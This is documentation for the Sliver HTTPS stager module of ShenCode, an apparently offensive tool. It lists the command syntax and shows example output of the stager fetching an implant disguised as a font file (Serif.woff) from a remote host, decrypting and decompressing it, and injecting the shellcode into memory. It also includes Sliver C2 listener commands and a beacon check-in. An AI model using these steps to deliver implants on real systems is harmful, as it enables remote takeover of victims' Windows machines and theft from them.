ShenCode - Sliver Stager

Sliver HTTPS Stager

Description

stager/sliver is only available for Windows

Connect back to a Sliver HTTPS stage and inject the implant shellcode.

Note: Please be patient, the shellcode needs some time to execute.

Command

shencode stager sliver [-h] -p PORT -r REMOTE_HOST [-a] [-c] [--headers] [-s SLEEP] [-ak AES_KEY] [-ai AES_IV]

options:
  -h, --help         show this help message and exit
  -p, --port         Remote port to connect to
  -r, --remote-host  Remote host to connect to e.g. 192.168.2.1

additional:
  -a, --aes          AES decrypt the stage after download
  -c, --compression  Uncompress the stage after download
  --headers          Print stage headers
  -s, --sleep        Sleep for x seconds before the stage is executed

AES options:
  -ak, --aes-key     Specify the AES key for decryption
  -ai, --aes-iv      Specify the AES IV for decryption

Example output

shencode

[*] Trying to download stage...
[i] Stage URL: https://pwnb0x:8080/Serif.woff
[+] Data downloaded, size: 15915744
[*] Trying to find payload position...
[+] Payload found, printing the first 8 bytes: bytearray(b'H\x83\xe4\xf0H\x83\xc4\x08')
[i] Stage length: 15915740
[+]Memory allocated!
[+] Buffer prepared!

Sliver

sliver > stage-listener --url https://0.0.0.0:8080 --profile be2

[*] Sliver name for profile be2: BLONDE_LUTTUCE
[*] Job 1 (https) started

sliver > mtls --lhost 0.0.0.0 --lport 443

[*] Starting mTLS listener ...

[*] Successfully started job #2

[*] Beacon 22c05dc4 BLONDE_LUTTUCE - 172.18.64.1:3028 (NB-HEC-A) - windows/amd64 - Tue, 04 Feb 2025 21:33:32 CET

[*] Download stage...
[*] Stage URL: https://172.29.17.74:8080/Serif.woff
[*] Printing size and 16 bytes of header:
	[#] Size: 4862640
	[#] 6C 69 6F 77 75 46 77 6E 4C 5A 65 57 34 7A 49 4E
	
[*]-[Download stage]
[*] decrypting data
[*] Printing size and 16 bytes of header:
	[#] Size: 4862640
	[#] 6C 69 6F 77 75 46 77 6E 4C 5A 65 57 34 7A 49 4E
	
[*] Printing size and 16 bytes of header:
[#] Size: 4862611
[#] 1F 8B 08 00 00 00 00 00 04 FF EC FD 0B 78 54 D5

[*] decompressing data
[*] Printing size and 16 bytes of header:
[#] Size: 4862611
[#] 1F 8B 08 00 00 00 00 00 04 FF EC FD 0B 78 54 D5

[*] Printing size and 16 bytes of header:
[#] Size: 11073756
[#] 48 83 E4 F0 48 83 C4 08 E8 80 CF A8 00 80 CF A8

[+] Stage downloaded! Size: 11073756 bytes
[*] Payload found!
[*] Memory allocated!
[+] Thread created, execute the payload